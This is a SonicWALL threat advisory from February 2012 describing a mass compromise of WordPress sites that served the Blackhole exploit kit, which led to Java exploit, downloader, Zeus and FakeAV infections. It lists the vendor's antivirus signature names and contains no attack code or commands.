Compromised WordPress sites use Black-Hole Exploit for Drive-by Infection (Feb 3, 2012)


SonicWALL UTM research team has received reports of a new mass compromise of WordPress websites leading to drive-by malware download using the Black Hole Exploit kit. The malware spreads simply by visiting an infected page on a compromised WordPress based websever. The Blackhole exploit kit is known for targetting a list of known vulnerabilities on the target system and when successful it often downloads and runs a malicious executable. The exploits we observed here target Java based vulnerabilities. Depending on whether the system is patched or not, if exploit is successful it will lead to the download of a malicious executable without user consent.

The compromised sites contain the malicious Black Hole Exploit script as seen below:

[Detected as GAV: ScrInject.WP (Trojan)]

The script is dynamic and contains different content upon each visit to the infected site. During analysis, we found that the script contained a hidden iframe that leads to a Black Hole Exploited site that targets java based vulnerabilities and serves the file: df190f61.jar [Detected as GAV: JVExp.A (Trojan)]

The jar file is executed and causes downloader Trojan setup.exe to be downloaded and executed. [Detected as GAV: Downloader.EWP (Trojan)]

The downloader Trojan can download any malware the attacker chooses. We observed both Zeus Trojan and XP Internet Security 2012 FakeAV being served to the infected machine.

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: ScrInject.WP (Trojan) current hit count: 5714
  • GAV: JVExp.A (Trojan)
  • GAV: Downloader.EWP (Trojan)
Security News
The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.